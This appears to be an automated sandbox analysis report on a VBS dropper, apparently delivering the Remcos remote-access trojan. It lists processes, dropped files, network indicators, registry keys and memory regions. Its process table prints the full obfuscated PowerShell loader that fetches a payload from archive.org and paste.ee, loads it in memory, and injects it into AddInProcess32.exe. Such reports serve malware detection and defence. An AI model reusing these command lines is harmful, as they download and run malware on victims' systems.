Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
asegurar.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12dpj4vy.nse.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxmgl4iw.zmg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kcpwvc25.2ev.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ua33vol0.qv3.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJysnMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent
= (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent
='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+'
='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od
= {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+'
, {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f
[cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
23spt.duckdns.org
|
|
||
|
https://paste.ee/d/tbzjY/0
|
188.114.97.3
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
https://ia600100.us.arXr
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
|
207.241.227.240
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://ia600100.us.archive.org
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://ia600100.us.archive.org
|
unknown
|
There are 23 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
23spt.duckdns.org
|
181.236.206.3
|
|
|
|
paste.ee
|
188.114.97.3
|
|
|
|
ia600100.us.archive.org
|
207.241.227.240
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.97.3
|
paste.ee
|
European Union
|
|
|
|
191.93.114.27
|
unknown
|
Colombia
|
|
|
|
181.236.206.3
|
23spt.duckdns.org
|
Colombia
|
|
|
|
207.241.227.240
|
ia600100.us.archive.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-RZH5WZ
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-RZH5WZ
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-RZH5WZ
|
time
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
288F000
|
stack
|
page read and write
|
|
|
|
19CAE02B000
|
trusted library allocation
|
page read and write
|
|
|
|
19CB5E90000
|
trusted library section
|
page read and write
|
|
|
|
19CADA81000
|
trusted library allocation
|
page read and write
|
|
|
|
C28000
|
heap
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
19CAEAC4000
|
trusted library allocation
|
page read and write
|
|
|
|
231A01FB000
|
trusted library allocation
|
page read and write
|
||
|
20021C32000
|
heap
|
page read and write
|
||
|
2319E480000
|
heap
|
page readonly
|
||
|
2319E4B0000
|
heap
|
page read and write
|
||
|
20022370000
|
heap
|
page read and write
|
||
|
20021C27000
|
heap
|
page read and write
|
||
|
7FFAAC720000
|
trusted library allocation
|
page read and write
|
||
|
200202B0000
|
heap
|
page read and write
|
||
|
28B0000
|
heap
|
page read and write
|
||
|
64882F7000
|
stack
|
page read and write
|
||
|
2002216B000
|
heap
|
page read and write
|
||
|
19C9D855000
|
heap
|
page read and write
|
||
|
19C9DDFE000
|
trusted library allocation
|
page read and write
|
||
|
231B8276000
|
heap
|
page read and write
|
||
|
2319FD30000
|
heap
|
page execute and read and write
|
||
|
19C9D89F000
|
heap
|
page read and write
|
||
|
200220E9000
|
heap
|
page read and write
|
||
|
231B8340000
|
heap
|
page read and write
|
||
|
2D7F000
|
stack
|
page read and write
|
||
|
7FFAAC600000
|
trusted library allocation
|
page execute and read and write
|
||
|
19C9D810000
|
heap
|
page read and write
|
||
|
7FFB0C721000
|
unkown
|
page execute read
|
||
|
7FFAAC5E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20021C7E000
|
heap
|
page read and write
|
||
|
20021C0B000
|
heap
|
page read and write
|
||
|
20022271000
|
heap
|
page read and write
|
||
|
E6E000
|
stack
|
page read and write
|
||
|
7FFB06955000
|
unkown
|
page readonly
|
||
|
231A01B0000
|
trusted library allocation
|
page read and write
|
||
|
20021C17000
|
heap
|
page read and write
|
||
|
7FFAAC650000
|
trusted library allocation
|
page read and write
|
||
|
200220CD000
|
heap
|
page read and write
|
||
|
19C9B82A000
|
heap
|
page read and write
|
||
|
7FFAAC680000
|
trusted library allocation
|
page read and write
|
||
|
231A062C000
|
trusted library allocation
|
page read and write
|
||
|
19C9D374000
|
heap
|
page read and write
|
||
|
20021C21000
|
heap
|
page read and write
|
||
|
2002231A000
|
heap
|
page read and write
|
||
|
EEE000
|
stack
|
page read and write
|
||
|
231A0606000
|
trusted library allocation
|
page read and write
|
||
|
2002242F000
|
heap
|
page read and write
|
||
|
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
|
200202D0000
|
heap
|
page read and write
|
||
|
231B8400000
|
heap
|
page read and write
|
||
|
20021C15000
|
heap
|
page read and write
|
||
|
200220D8000
|
heap
|
page read and write
|
||
|
7FFAAC5DA000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC410000
|
trusted library allocation
|
page read and write
|
||
|
C10000
|
heap
|
page read and write
|
||
|
6F6187E000
|
stack
|
page read and write
|
||
|
231B8345000
|
heap
|
page read and write
|
||
|
19C9F109000
|
trusted library allocation
|
page read and write
|
||
|
2319E290000
|
heap
|
page read and write
|
||
|
7FFAAC794000
|
trusted library allocation
|
page read and write
|
||
|
231A027B000
|
trusted library allocation
|
page read and write
|
||
|
19C9D957000
|
heap
|
page execute and read and write
|
||
|
7BC000
|
stack
|
page read and write
|
||
|
7FFAAC5D4000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
|
2319E1D0000
|
heap
|
page read and write
|
||
|
20022315000
|
heap
|
page read and write
|
||
|
7FFAAC4C6000
|
trusted library allocation
|
page read and write
|
||
|
2319FE10000
|
heap
|
page read and write
|
||
|
20021C58000
|
heap
|
page read and write
|
||
|
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
|
20021C0A000
|
heap
|
page read and write
|
||
|
19C9B9B0000
|
heap
|
page read and write
|
||
|
20022316000
|
heap
|
page read and write
|
||
|
7FFB0C720000
|
unkown
|
page readonly
|
||
|
2002010F000
|
heap
|
page read and write
|
||
|
19CB5B5B000
|
heap
|
page read and write
|
||
|
231B82C1000
|
heap
|
page read and write
|
||
|
6F6127E000
|
stack
|
page read and write
|
||
|
19C9E039000
|
trusted library allocation
|
page read and write
|
||
|
6F615F7000
|
stack
|
page read and write
|
||
|
231B831A000
|
heap
|
page read and write
|
||
|
1B275FE000
|
stack
|
page read and write
|
||
|
7FFB06952000
|
unkown
|
page readonly
|
||
|
7FFAAC770000
|
trusted library allocation
|
page read and write
|
||
|
648857F000
|
stack
|
page read and write
|
||
|
20020117000
|
heap
|
page read and write
|
||
|
231B0161000
|
trusted library allocation
|
page read and write
|
||
|
19C9D1F0000
|
trusted library allocation
|
page read and write
|
||
|
231B8355000
|
heap
|
page read and write
|
||
|
7FFAAC5F2000
|
trusted library allocation
|
page read and write
|
||
|
19C9DDF1000
|
trusted library allocation
|
page read and write
|
||
|
19C9B81C000
|
heap
|
page read and write
|
||
|
19C9F49C000
|
trusted library allocation
|
page read and write
|
||
|
64885FE000
|
stack
|
page read and write
|
||
|
7FFAAC720000
|
trusted library allocation
|
page read and write
|
||
|
20021C04000
|
heap
|
page read and write
|
||
|
231B84E0000
|
heap
|
page read and write
|
||
|
231A01B3000
|
trusted library allocation
|
page read and write
|
||
|
2319E450000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC710000
|
trusted library allocation
|
page read and write
|
||
|
64883F9000
|
stack
|
page read and write
|
||
|
6F6137E000
|
stack
|
page read and write
|
||
|
7FFAAC4D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
19C9DE0A000
|
trusted library allocation
|
page read and write
|
||
|
200201AF000
|
heap
|
page read and write
|
||
|
231B8343000
|
heap
|
page read and write
|
||
|
6F6167C000
|
stack
|
page read and write
|
||
|
2319E470000
|
trusted library allocation
|
page read and write
|
||
|
20022325000
|
heap
|
page read and write
|
||
|
231A0161000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5D1000
|
trusted library allocation
|
page read and write
|
||
|
2319E276000
|
heap
|
page read and write
|
||
|
2002231B000
|
heap
|
page read and write
|
||
|
7FFAAC42D000
|
trusted library allocation
|
page execute and read and write
|
||
|
20021C0B000
|
heap
|
page read and write
|
||
|
7FFAAC760000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4F6000
|
trusted library allocation
|
page execute and read and write
|
||
|
200200C0000
|
heap
|
page read and write
|
||
|
7DF48DDD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B277FB000
|
stack
|
page read and write
|
||
|
2002230B000
|
heap
|
page read and write
|
||
|
6488378000
|
stack
|
page read and write
|
||
|
1B26FFE000
|
stack
|
page read and write
|
||
|
20021C02000
|
heap
|
page read and write
|
||
|
7FFAAC660000
|
trusted library allocation
|
page read and write
|
||
|
64881FE000
|
stack
|
page read and write
|
||
|
19CB5E80000
|
heap
|
page read and write
|
||
|
2A3C000
|
stack
|
page read and write
|
||
|
648807D000
|
stack
|
page read and write
|
||
|
7FFAAC630000
|
trusted library allocation
|
page read and write
|
||
|
20021C02000
|
heap
|
page read and write
|
||
|
20021C35000
|
heap
|
page read and write
|
||
|
19C9DA11000
|
trusted library allocation
|
page read and write
|
||
|
231B8840000
|
heap
|
page read and write
|
||
|
7FFAAC620000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC700000
|
trusted library allocation
|
page read and write
|
||
|
2E7F000
|
stack
|
page read and write
|
||
|
200220DD000
|
heap
|
page read and write
|
||
|
6F618FB000
|
stack
|
page read and write
|
||
|
231A0268000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6B0000
|
trusted library allocation
|
page read and write
|
||
|
19C9B865000
|
heap
|
page read and write
|
||
|
200222EE000
|
heap
|
page read and write
|
||
|
6F613FF000
|
stack
|
page read and write
|
||
|
7FFAAC670000
|
trusted library allocation
|
page read and write
|
||
|
19CAEA2B000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7A3000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC781000
|
trusted library allocation
|
page read and write
|
||
|
2890000
|
heap
|
page read and write
|
||
|
231A02BA000
|
trusted library allocation
|
page read and write
|
||
|
200220A8000
|
heap
|
page read and write
|
||
|
7FFAAC420000
|
trusted library allocation
|
page read and write
|
||
|
20021C32000
|
heap
|
page read and write
|
||
|
7FFAAC413000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB06931000
|
unkown
|
page execute read
|
||
|
231A01CE000
|
trusted library allocation
|
page read and write
|
||
|
200220E4000
|
heap
|
page read and write
|
||
|
200200E0000
|
heap
|
page read and write
|
||
|
19C9F6FA000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20020118000
|
heap
|
page read and write
|
||
|
7FFAAC640000
|
trusted library allocation
|
page read and write
|
||
|
19CADCFD000
|
trusted library allocation
|
page read and write
|
||
|
19CADD0B000
|
trusted library allocation
|
page read and write
|
||
|
231A0274000
|
trusted library allocation
|
page read and write
|
||
|
19C9DA91000
|
trusted library allocation
|
page read and write
|
||
|
200220B5000
|
heap
|
page read and write
|
||
|
231B01D1000
|
trusted library allocation
|
page read and write
|
||
|
2319E270000
|
heap
|
page read and write
|
||
|
20021C7E000
|
heap
|
page read and write
|
||
|
2319FE16000
|
heap
|
page read and write
|
||
|
2002019C000
|
heap
|
page read and write
|
||
|
20021C70000
|
heap
|
page read and write
|
||
|
7FFAAC412000
|
trusted library allocation
|
page read and write
|
||
|
20021D20000
|
heap
|
page read and write
|
||
|
7FFAAC4D0000
|
trusted library allocation
|
page read and write
|
||
|
19C9DE06000
|
trusted library allocation
|
page read and write
|
||
|
19C9DA00000
|
heap
|
page execute and read and write
|
||
|
7FFAAC6E0000
|
trusted library allocation
|
page read and write
|
||
|
20020420000
|
heap
|
page read and write
|
||
|
2002208D000
|
heap
|
page read and write
|
||
|
20022098000
|
heap
|
page read and write
|
||
|
6487F7E000
|
stack
|
page read and write
|
||
|
2319E4B5000
|
heap
|
page read and write
|
||
|
20021C04000
|
heap
|
page read and write
|
||
|
19C9F0FD000
|
trusted library allocation
|
page read and write
|
||
|
6F60DFE000
|
stack
|
page read and write
|
||
|
7FFB0C736000
|
unkown
|
page readonly
|
||
|
200201AF000
|
heap
|
page read and write
|
||
|
7FFB0C742000
|
unkown
|
page readonly
|
||
|
20022267000
|
heap
|
page read and write
|
||
|
7FFAAC650000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC750000
|
trusted library allocation
|
page read and write
|
||
|
19C9B81E000
|
heap
|
page read and write
|
||
|
2319FDA0000
|
heap
|
page read and write
|
||
|
20020425000
|
heap
|
page read and write
|
||
|
474000
|
remote allocation
|
page execute and read and write
|
||
|
20020110000
|
heap
|
page read and write
|
||
|
7FFAAC6C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
|
2319E327000
|
heap
|
page read and write
|
||
|
7FFAAC4CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC530000
|
trusted library allocation
|
page execute and read and write
|
||
|
231A01C8000
|
trusted library allocation
|
page read and write
|
||
|
6F6177E000
|
stack
|
page read and write
|
||
|
7FFAAC5D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
19C9D83B000
|
heap
|
page read and write
|
||
|
B36000
|
heap
|
page read and write
|
||
|
20021C53000
|
heap
|
page read and write
|
||
|
2002230B000
|
heap
|
page read and write
|
||
|
7FFAAC640000
|
trusted library allocation
|
page read and write
|
||
|
6F6147F000
|
stack
|
page read and write
|
||
|
20021C7C000
|
heap
|
page read and write
|
||
|
1B26EFE000
|
stack
|
page read and write
|
||
|
19C9F327000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
19C9B9F0000
|
heap
|
page read and write
|
||
|
D30000
|
heap
|
page read and write
|
||
|
20022371000
|
heap
|
page read and write
|
||
|
200201AF000
|
heap
|
page read and write
|
||
|
20022342000
|
heap
|
page read and write
|
||
|
200220BD000
|
heap
|
page read and write
|
||
|
20021C50000
|
heap
|
page read and write
|
||
|
7FFB06946000
|
unkown
|
page readonly
|
||
|
20021C00000
|
heap
|
page read and write
|
||
|
19C9B9E0000
|
heap
|
page read and write
|
||
|
7FFAAC610000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC610000
|
trusted library allocation
|
page read and write
|
||
|
6F611FE000
|
stack
|
page read and write
|
||
|
B20000
|
heap
|
page read and write
|
||
|
20021C13000
|
heap
|
page read and write
|
||
|
7FFAAC620000
|
trusted library allocation
|
page read and write
|
||
|
19C9D820000
|
heap
|
page read and write
|
||
|
7FFAAC5C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B7D000
|
stack
|
page read and write
|
||
|
7FFAAC5C1000
|
trusted library allocation
|
page read and write
|
||
|
2002209D000
|
heap
|
page read and write
|
||
|
19C9D370000
|
heap
|
page read and write
|
||
|
19C9DE35000
|
trusted library allocation
|
page read and write
|
||
|
20022342000
|
heap
|
page read and write
|
||
|
2002010A000
|
heap
|
page read and write
|
||
|
231B8336000
|
heap
|
page read and write
|
||
|
2002011F000
|
heap
|
page read and write
|
||
|
20021C68000
|
heap
|
page read and write
|
||
|
2002207C000
|
heap
|
page read and write
|
||
|
20022317000
|
heap
|
page read and write
|
||
|
278E000
|
stack
|
page read and write
|
||
|
20022326000
|
heap
|
page read and write
|
||
|
648817E000
|
stack
|
page read and write
|
||
|
19C9D84C000
|
heap
|
page read and write
|
||
|
648847E000
|
stack
|
page read and write
|
||
|
19C9D262000
|
trusted library allocation
|
page read and write
|
||
|
AFC000
|
stack
|
page read and write
|
||
|
19C9D7D0000
|
heap
|
page execute and read and write
|
||
|
20022079000
|
heap
|
page read and write
|
||
|
19CB5A30000
|
heap
|
page read and write
|
||
|
20022342000
|
heap
|
page read and write
|
||
|
478000
|
remote allocation
|
page execute and read and write
|
||
|
231A0277000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6B0000
|
trusted library allocation
|
page read and write
|
||
|
19C9B86A000
|
heap
|
page read and write
|
||
|
2F7F000
|
stack
|
page read and write
|
||
|
20021C35000
|
heap
|
page read and write
|
||
|
7FFB0C740000
|
unkown
|
page read and write
|
||
|
6487BEE000
|
stack
|
page read and write
|
||
|
7FFAAC7A0000
|
trusted library allocation
|
page read and write
|
||
|
19C9F131000
|
trusted library allocation
|
page read and write
|
||
|
2002242F000
|
heap
|
page read and write
|
||
|
19C9DDFB000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5CA000
|
trusted library allocation
|
page read and write
|
||
|
64884FE000
|
stack
|
page read and write
|
||
|
19C9EA39000
|
trusted library allocation
|
page read and write
|
||
|
2002231E000
|
heap
|
page read and write
|
||
|
19CB5B10000
|
heap
|
page read and write
|
||
|
6F610FD000
|
stack
|
page read and write
|
||
|
2319FD10000
|
heap
|
page execute and read and write
|
||
|
19C9B9E4000
|
heap
|
page read and write
|
||
|
19C9D6CA000
|
heap
|
page read and write
|
||
|
231A017B000
|
trusted library allocation
|
page read and write
|
||
|
231B0170000
|
trusted library allocation
|
page read and write
|
||
|
231A0697000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC798000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC41D000
|
trusted library allocation
|
page execute and read and write
|
||
|
6F61073000
|
stack
|
page read and write
|
||
|
19C9D260000
|
trusted library allocation
|
page read and write
|
||
|
19C9F0E4000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6D0000
|
trusted library allocation
|
page read and write
|
||
|
231A01B5000
|
trusted library allocation
|
page read and write
|
||
|
20021C63000
|
heap
|
page read and write
|
||
|
20021C7E000
|
heap
|
page read and write
|
||
|
19C9D840000
|
heap
|
page read and write
|
||
|
7FFAAC422000
|
trusted library allocation
|
page read and write
|
||
|
2002216B000
|
heap
|
page read and write
|
||
|
20022071000
|
heap
|
page read and write
|
||
|
231B8270000
|
heap
|
page read and write
|
||
|
2319E243000
|
heap
|
page read and write
|
||
|
20021C2B000
|
heap
|
page read and write
|
||
|
200220AD000
|
heap
|
page read and write
|
||
|
2319E410000
|
heap
|
page read and write
|
||
|
2319E1E0000
|
heap
|
page read and write
|
||
|
2319E2F6000
|
heap
|
page read and write
|
||
|
200200F2000
|
heap
|
page read and write
|
||
|
7FFAAC6F0000
|
trusted library allocation
|
page read and write
|
||
|
B30000
|
heap
|
page read and write
|
||
|
2C7F000
|
stack
|
page read and write
|
||
|
19C9F352000
|
trusted library allocation
|
page read and write
|
||
|
19C9B7F3000
|
heap
|
page read and write
|
||
|
20021C07000
|
heap
|
page read and write
|
||
|
19C9DE31000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC42B000
|
trusted library allocation
|
page read and write
|
||
|
20022081000
|
heap
|
page read and write
|
||
|
7FFAAC680000
|
trusted library allocation
|
page read and write
|
||
|
1B26B2A000
|
stack
|
page read and write
|
||
|
2319FD17000
|
heap
|
page execute and read and write
|
||
|
20020109000
|
heap
|
page read and write
|
||
|
6487EFE000
|
stack
|
page read and write
|
||
|
20021C74000
|
heap
|
page read and write
|
||
|
19CADA20000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC660000
|
trusted library allocation
|
page read and write
|
||
|
200220EB000
|
heap
|
page read and write
|
||
|
20022322000
|
heap
|
page read and write
|
||
|
7FFAAC6D0000
|
trusted library allocation
|
page read and write
|
||
|
2319E2BF000
|
heap
|
page read and write
|
||
|
20021C53000
|
heap
|
page read and write
|
||
|
2319E27C000
|
heap
|
page read and write
|
||
|
19C9D83D000
|
heap
|
page read and write
|
||
|
20021C6B000
|
heap
|
page read and write
|
||
|
7FFAAC7C0000
|
trusted library allocation
|
page read and write
|
||
|
19C9F631000
|
trusted library allocation
|
page read and write
|
||
|
6F61579000
|
stack
|
page read and write
|
||
|
2319E2B8000
|
heap
|
page read and write
|
||
|
6487E73000
|
stack
|
page read and write
|
||
|
19C9F10D000
|
trusted library allocation
|
page read and write
|
||
|
19C9F0E9000
|
trusted library allocation
|
page read and write
|
||
|
19CB5B95000
|
heap
|
page read and write
|
||
|
7FFAAC430000
|
trusted library allocation
|
page read and write
|
||
|
